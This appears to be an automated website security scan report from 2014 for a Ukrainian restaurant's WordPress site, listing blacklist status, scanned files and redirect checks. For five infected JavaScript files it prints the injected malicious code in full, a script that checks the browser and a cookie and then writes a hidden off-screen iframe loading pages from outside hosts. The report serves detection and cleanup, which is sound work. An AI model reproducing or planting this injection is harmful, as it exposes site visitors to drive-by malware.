Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=restoran-amulet.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://restoran-amulet.com.ua/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://restoran-amulet.com.ua/ | 200 OK Content-Length: 30718 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/wp-content/themes/restoran/script.js | 200 OK Content-Length: 1611 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!po) { document.write('<ifra'+'me src="http://popikals.thunderbarrel.com/pociskalet15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 961 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!ulrcont && bb) { document.write('<iframe src="http://digialto.9chan.us/nunegarow15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="lastshow=1; path=/; expires="+date.toUTCString(); } } Visitrepositorium(); Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-content/plugins/content-slide/js/coin-slider.js?ver=3.4.1 | 200 OK Content-Length: 1622 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!po) { document.write('<ifra'+'me src="http://rutioka.sydneyinlinehockey.com/asobentars15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>'); } } Showcontentid(); Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0 | 200 OK Content-Length: 961 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!ulrcont && bb) { document.write('<iframe src="http://digialto.9chan.us/nunegarow15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="lastshow=1; path=/; expires="+date.toUTCString(); } } Visitrepositorium(); Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-includes/js/tw-sack.js?ver=1.6.1 | 200 OK Content-Length: 961 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!ulrcont && bb) { document.write('<iframe src="http://digialto.9chan.us/nunegarow15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="lastshow=1; path=/; expires="+date.toUTCString(); } } Visitrepositorium(); Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-content/plugins/wp-polls/polls-js-packed.js?ver=2.40 | 200 OK Content-Length: 1994 Content-Type: application/x-javascript | clean |
http://lite.piclens.com/current/piclens_optimized.js | 200 OK Content-Length: 21750 Content-Type: application/x-javascript | clean |
http://restoran-amulet.com.ua/nashi-zaly/ | 200 OK Content-Length: 30272 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/karta-sajta/ | 200 OK Content-Length: 22854 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ | 200 OK Content-Length: 25788 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ / | 404 Not Found Content-Length: 21356 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ / / | 404 Not Found Content-Length: 21352 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ / / / | 404 Not Found Content-Length: 21364 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ / / / / | 404 Not Found Content-Length: 21346 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: restoran-amulet.com.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 27 Aug 2014 12:26:39 GMT
Server: nginx/1.4.2
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://restoran-amulet.com.ua/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: restoran-amulet.com.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 27 Aug 2014 12:26:39 GMT
Server: nginx/1.4.2
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://restoran-amulet.com.ua/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: restoran-amulet.com.ua
Referer: http://www.google.com/search?q=restoran-amulet.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: restoran-amulet.com.ua
Referer: http://www.google.com/search?q=restoran-amulet.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.